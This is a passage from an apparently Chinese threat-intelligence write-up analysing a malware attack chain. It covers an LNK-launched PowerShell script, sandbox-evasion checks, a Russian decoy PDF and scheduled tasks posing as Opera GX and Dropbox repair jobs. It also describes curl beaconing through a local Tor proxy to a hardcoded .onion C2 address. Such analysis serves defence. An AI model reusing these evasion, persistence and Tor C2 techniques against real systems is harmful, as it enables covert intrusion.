normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">localResponseSummary.pub</span></span></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">主机公钥</span></span></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">受害机的 SSH 服务端公钥。</span></span></p></td></tr></tbody></table><h2 style=""><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">3.</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">攻击组件分析</span></span></h2><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;font-weight: bold;">1）主控脚本分析</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Lnk文件运行后，其首先加载的是主控脚本currentSessionTrigger，该文件具体内容如下所示：</span><o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: center;line-height: 150%;"><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.43655413271245636" data-w="859" style="width:553.739990234375px;height:241.74002075195312px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4e95abc6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXI1khRuziaevicCFb5od65iaQbnHgJia5wE7C8qibyKmefhicvjfCribV5bB7meIyDRe1ugclzLMNSHiaN1ZanrCEDD8qeRAlicf1UINAdQ%2F640%3Fwx_fmt%3Dpng"/></span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">currentSessionTrigger</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本作为整个攻击链的初始化核心，集成了环境检测、反取证及持久化部署功能。脚本运行开始即执行严格的沙箱及虚拟机检测逻辑，通过校验</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">%APPDATA%\Microsoft\Windows\Recent</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">路径下的</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.lnk</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件数量（阈值≥10）以及系统当前运行的进程总数（阈值≥50）来判定宿主环境。若任一条件未满足，脚本将判定当前环境为虚拟机或分析沙箱并立即终止运行。在确认环境安全后，脚本会立即执行诱饵展示与痕迹清除操作：将伪装的 PDF 文档（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Iskhod_7582_Predstavlenie_na_naznachenie.pdf</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">）移动至用户的 Downloads目录并调用系统命令打开，以此转移受害者注意力。打开的诱饵文档如下所示。</span><o:page></o:page></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0112107623318385" data-w="892" style="width: 430.85px;height: 435.68px;" src="https://wechat2rss.xlab.app/img-proxy/?k=dea35f2a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJcnf8ALCAy46J4BACicJKlDtHWPXZaU1kVeAc8swqsniaSwklRCoMuBG6GmGtIsbQ4Lp72n1HjKV3MiapQFnKRtmviaf0hpT7dQvk%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">随后，主控脚本递归删除释放目录（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">uuidPeriod</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">）及脚本自身文件，最大限度消除磁盘取证痕迹。在确保单实例运行方面，脚本创建了名为</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Global\ratingMethod</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的系统互斥体，一旦检测到同名互斥体存在即退出，防止多重实例冲突。紧接着，脚本通过读取并修改预置的XML模板（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">externalCustomerDate.xml</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> 与 </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">previousAdminResult.xml</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">），将模板中的</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">$UserId</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">占位符替换为当前环境的“域名\用户名”，并据此注册名为</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">OperagxRepairTask</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">和</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">DropboxRepairTask</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的两个计划任务。这两个任务分别伪装成Opera GX浏览器和Dropbox的修复程序，实现了恶意载荷的开机自启与持久化驻留。</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本最后阶段是建立C2通信通道。脚本进入循环等待状态，持续监测</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">%APPDATA%\outlook\exceptionTag\hostname</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件（由Tor服务端启动后生成的隐藏服务标识）是否生成。一旦获取到该文件，脚本读取其前56字节的主机名片段，结合当前用户名与硬编码版本号（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3-vquemoxm</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">），拼接成查询参数。随后，脚本调用系统</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">curl</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">命令，通过参数</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">--socks5-hostname localhost:9050</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">强制流量经由本地Tor代理转发，并配合 </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">--retry 1000</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> 及 </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">--retry-all-errors</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> 参数确保持续高频重试，最终将受害者的上线信息发送至硬编码的暗网C2地址（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">kvk46su7d2qi6g4n43syp4zbsf2rihnc6ztj77qtc2ojvewjqvqilnqd.onion</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">），完成整个攻击链的闭环。下图是Tor服务端运行后的hostname。</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4453125" data-w="640" style="width: 514.57px;height: 229.16px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ca8a9764&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXI998dpSJ9cibrzBUEXxccyjIZynylLY5q4veWJ8zxTf8ow2fDyDwtkJqP0B4iamGENgbjsEemtx2sbceDD6BqsjiagdZrVl6oB8k%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">2）计划任务分析</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">在主控脚本中会加载两个XML配置文件，以创建两个计划任务，这两个计划任务具体内容如下：</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9457671957671958" data-s="300,640" data-type="png" data-w="756" style="width:100%;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXJicTUdz4XI7ic8VmiaSicibQL5Ye2ap4ZibFV4x2jnOv6buPCQ3V4J43wtRzy0v4FTdfQ30RO50vKMl30icZxyvyGxhsjMym08FyXL44/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="147" data-backw="578" data-backh="547" data-imgfileid="100024781" src="https://wechat2rss.xlab.app/img-proxy/?k=e5d5163c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJicTUdz4XI7ic8VmiaSicibQL5Ye2ap4ZibFV4x2jnOv6buPCQ3V4J43wtRzy0v4FTdfQ30RO50vKMl30icZxyvyGxhsjMym08FyXL44%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9156785243741765" data-s="300,640" data-type="png" data-w="759" type="block" data-imgfileid="100024782" src="https://wechat2rss.xlab.app/img-proxy/?k=941ec684&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLIp1ThPKUichTTQ1m9E7MIu3icujm45LgY1aAicSXwFEkdQTkUNF4tsQBiaJN412blrhKgpVqSePWXzDic0j8gvFehTQnGpGYRkFkU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">从这两个XML文件可以看到其核心触发机制配置为 LogonTrigger，即在用户登录时自动执行。模板中的</span><userid><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">$UserId</span></userid><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">字段设为占位符，配合前序 PowerShell 脚本的执行逻辑，该字段会在运行时被动态替换为受害者的“域名\用户名”，从而确保恶意任务精准挂载至受攻陷的用户账户下，实现开机即运行。</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft 